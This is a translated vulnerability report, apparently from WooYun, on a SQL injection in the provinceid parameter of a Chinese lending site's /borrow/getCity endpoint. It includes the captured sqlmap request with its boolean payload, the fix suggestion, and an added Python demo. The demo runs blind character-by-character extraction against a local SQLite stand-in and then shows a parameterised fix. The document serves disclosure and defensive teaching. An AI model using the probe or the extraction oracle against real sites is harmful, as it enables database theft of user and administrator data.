WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --------http://drop.zone.ci/
2015-08-06: Details sent to the vendor, awaiting vendor handling. 2015-08-10: Vendor confirmed; details disclosed to the vendor only. 2015-08-20: Details disclosed to core white hats and experts in the relevant field. 2015-08-30: Details disclosed to regular white hats. 2015-09-09: Details disclosed to intern white hats. 2015-09-24: Details disclosed to the public.
The site has a SQL injection (POST parameter provinceid of /borrow/getCity). Through it the database is readable, exposing a large number of user records including phone numbers, as well as the administrator accounts.
sqlmap test from the captured POST request (the body carries the boolean-based probe provinceid=3 AND 3*2*1=6 AND 511=511, URL-encoded; a page identical to the baseline for this TRUE condition and different for a FALSE one confirms the injection):
POST /borrow/getCity HTTP/1.1
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hudai.com/
Cookie: tc=AQAAAFzLdUn9fQAAmm8N0rn7R5LFCUuX; PHPSESSID=q7acq3vrv1r2ter178srjfgfv1; HUDAI_VISITOR=f0a9ad2c1d4c6eb0b26b9561ae97c396; userCheckTime=1438668536; _visitid=55c04fed44112; Hm_lvt_67ac57173ff1e28d2240afc0d4134f16=1438667464,1438667497,1438667498,1438667522; Hm_lpvt_67ac57173ff1e28d2240afc0d4134f16=1438667522; _last_visit_time_6b2ff18fccf8ef8698e7e0170f91f6ee=1438667143000; _last_visit_time_f9f7728076bcb1a00fb96b1a0987622d=1438667143000; _last_visit_time_dddb23b3ef92a29d62a58c0851bda719=1438667143000; _last_visit_time_11b16e2a11e0f098abd493851e927a4e=1438667143000; _last_visit_time_3100b311da25efe2212be4c4a6a4e388=1438667143000; tempid=125596; type=0; looyu_id=b8cddca6ed8109ac02748486ffc796d479_20000449%3A1; looyu_20000449=v%3Ab8cddca6ed8109ac02748486ffc796d479%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8103.looyu.com/monitor%2Cp0%3Ahttp%253A//www.hudai.com/loan/loan; _alicdn_sec=55c0519fdd7972f19b32c9a9f9c45ada83b35f9a; HMACCOUNT=DDF25657E00D70EC; _last_visit_time_db9ee38e87b85c0819a1ab08a26d58bb=1438667183000; _last_visit_time_6b6d04de9ea2aa77ed165c6e5f5a0ced=1438667184000; _last_visit_time_11503193a2aa8db001e1490b14541500=1438667208000; __t99_20000449="_u:b8cddca6ed8109ac02748486ffc796d479,_v:b8cddca6ed8109ac02748486ffc796d479,_site:0,_ct:1,_ref:http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29,_p0:http%3A%2F%2Fwww.hudai.com%2Floan%2Floan,_r:"; _last_visit_time_7373af264f170a57301b11965f834254=1438667235000; _last_visit_time_c7276b1f99586e08d15ee18813a9861a=1438667236000; _last_visit_time_4bd23435eeec57249f85e2c55baf6c7a=1438667238000; _last_visit_time_630f20936e4c6623d174e552182d013b=1438667248000; _last_visit_time_2c7af8127f0a08135a039f0f4a6aea8a=1438667256000; _last_visit_time_6b5dc2e5e82f48e8a63eeea77352f220=1438667262000; _last_visit_time_6505f56bf1f79cec3aa41d0e3dda824d=1438667268000; _last_visit_time_882898a61b2be9aa0656acfe1c142011=1438667281000; _last_visit_time_376932267803f24ee70bb3d3db8af256=1438667285000; _last_visit_time_e6415e538946773660e7f53470ee5d66=1438667301000; _last_visit_time_a9e567462283f46b96882efee79a1882=1438667308000; _last_visit_time_cd782cfada5883132e1f44ffff401f7f=1438667318000; _last_visit_time_61277501ea1116c707ec148fc71b550e=1438667323000; _last_visit_time_01b08203032e7f27c6590e4d28d74c8b=1438667335000; _last_visit_time_aac840e697bec5b32660e05ada0582a4=1438667336000; _last_visit_time_a8801dd29656ecb574951312c1c00a37=1438667360000; _last_visit_time_ae5437ccbccb6ac5e0144346716274a3=1438667366000; _last_visit_time_6456861f1a0be72ba252dd303fdf8315=1438667454000; _last_visit_time_446f1fd63d5f81b2bb77a3f674dacec0=1438667467000; _last_visit_time_0e6437f9cb821cc3d62f211c5a3ab0c9=1438667470000; BAIDUID=E7F07168D5510DF0E8741451203EEF0B:FG=1; v="2015080413520300080412700153777411|favorite:clipboard:email"; opxPID=2015080413520300080412700153777411; u=1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|; JSESSIONID=707F1E51529A6DF8C75E2D4D8569A5E2; _last_visit_time_5de416ce9cef64ae3843fa0b62a9f684=1438667625000; _last_visit_time_f334c8d2e2a7b1145738396e02ca2e26=1438667626000; _last_visit_time_b1cb656bc97cf228f9369c2d61214584=1438667627000; _last_visit_time_731e5ee23e438fa16448654ad5b2040e=1438667632000; _last_visit_time_8a1f523aa40dda1c81be2b8341b7fd79=1438667633000; _last_visit_time_70b584525c55de0e88be98f83f594df5=1438667772000; _last_visit_time_cf1cb8b01eb1aa525ddd77a4b3821b57=1438667774000; _last_visit_time_6a8c3c292405e9604b4201628b382a0c=1438667776000; _last_visit_time_2135a7a5e5373b785822abc09f5aab89=1438667876000; _last_visit_time_a6495592356b94e88ac36e2211add440=1438667904000; _last_visit_time_210d77f46e8dd6b487b3d8fa31a10ca0=1438667931000; _last_visit_time_d60c8d81045aef1b64cc7eeabaa1d033=1438667983000; _last_visit_time_5a8054d44b31b91a34723c58775b9abc=1438668002000
Host: www.hudai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

provinceid=3%20AND%203*2*1%3d6%20AND%20511%3d511
Database information:
Administrator information:
User information:
Fix suggestion: filter the input (validate provinceid as an integer and pass it to the query as a bound parameter rather than concatenating it into the SQL string).
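The following is an added example, not code from the report or from the site; it models both the boolean-based probe in the captured request and the fix suggested above. It assumes a city lookup of the shape "SELECT name FROM city WHERE provinceid = <value>" behind /borrow/getCity, with a constructed in-memory SQLite database, a made-up admin row, and a simulated endpoint standing in for the real PHP handler (all assumptions). It decodes the captured body, shows why the TRUE/FALSE pair (3*2*1=6 vs 3*2*1=7) proves the injection, turns the injectable parameter into a true/false oracle that recovers a table value character by character (which is how a city lookup ends up leaking administrator and user data), and shows the same checks failing against a parameterised handler.

```python
import json
import sqlite3
import string
from urllib.parse import parse_qs

# Request body exactly as captured in the report above (URL-encoded).
CAPTURED_BODY = "provinceid=3%20AND%203*2*1%3d6%20AND%20511%3d511"


def decode_body(body):
    """URL-decode the form body the way the server runtime would before use."""
    return parse_qs(body, keep_blank_values=True)["provinceid"][0]


def make_db():
    """Constructed in-memory stand-in for the site's database. The schema and
    rows are assumptions made up for this demo, not the real hudai.com data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE city (id INTEGER, provinceid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO city VALUES (?, ?, ?)",
                     [(1, 3, "Guangzhou"), (2, 3, "Shenzhen"), (3, 4, "Hangzhou")])
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('sysadmin', 'not-a-real-hash')")
    return conn


def get_city_vulnerable(conn, provinceid):
    """Assumed shape of the bug: the parameter is concatenated into the SQL."""
    sql = "SELECT name FROM city WHERE provinceid = " + provinceid
    return [row[0] for row in conn.execute(sql)]


def get_city_fixed(conn, provinceid):
    """Hardened version: integer check plus bound parameter, so the value is
    only ever data and never parsed as SQL."""
    pid = int(provinceid)  # raises ValueError for anything that is not an integer
    return [row[0] for row in conn.execute(
        "SELECT name FROM city WHERE provinceid = ?", (pid,))]


def endpoint(conn, handler, provinceid):
    """Simulated /borrow/getCity response body; errors collapse to one fixed string."""
    try:
        return json.dumps(handler(conn, provinceid))
    except (ValueError, sqlite3.Error):
        return "error"


def boolean_injectable(conn, handler, base_value="3"):
    """The sqlmap-style check the captured request performs: a TRUE tautology
    (3*2*1=6) must leave the response unchanged and a FALSE one must change it."""
    baseline = endpoint(conn, handler, base_value)
    same = endpoint(conn, handler, base_value + " AND 3*2*1=6 AND 511=511")
    diff = endpoint(conn, handler, base_value + " AND 3*2*1=7 AND 511=511")
    return baseline == same and same != diff


def make_oracle(conn, handler, base_value="3"):
    """True/false oracle built from the injectable parameter."""
    baseline = endpoint(conn, handler, base_value)
    return lambda cond: endpoint(conn, handler, base_value + " AND " + cond) == baseline


def blind_extract(oracle, subquery, charset=string.ascii_lowercase + string.digits,
                  max_len=32):
    """Recover the scalar result of `subquery` one character at a time through
    the oracle; this is how a harmless-looking city lookup leaks other tables."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(f"substr(({subquery}),{pos},1)='{ch}'"):
                out += ch
                break
        else:
            return out  # no character matched at this position: end of the value
    return out


if __name__ == "__main__":
    conn = make_db()
    print("decoded payload:", decode_body(CAPTURED_BODY))
    print("vulnerable handler injectable:", boolean_injectable(conn, get_city_vulnerable))
    print("fixed handler injectable:", boolean_injectable(conn, get_city_fixed))
    print("admin username via blind oracle:",
          blind_extract(make_oracle(conn, get_city_vulnerable),
                        "SELECT username FROM admin LIMIT 1"))
```

Against the fixed handler every probe containing SQL fails the integer check and returns the same error body, so the TRUE and FALSE conditions are indistinguishable and the oracle recovers nothing; the type check alone is not the defence, the bound parameter is, but together they also stop the scanner's differential test from ever producing a signal.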
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-08-10 14:46
CNVD confirmed and reproduced the issue described, and has notified the site's operating organisation (software vendor) through the contact details published on the site (or a previously established handling channel).
None yet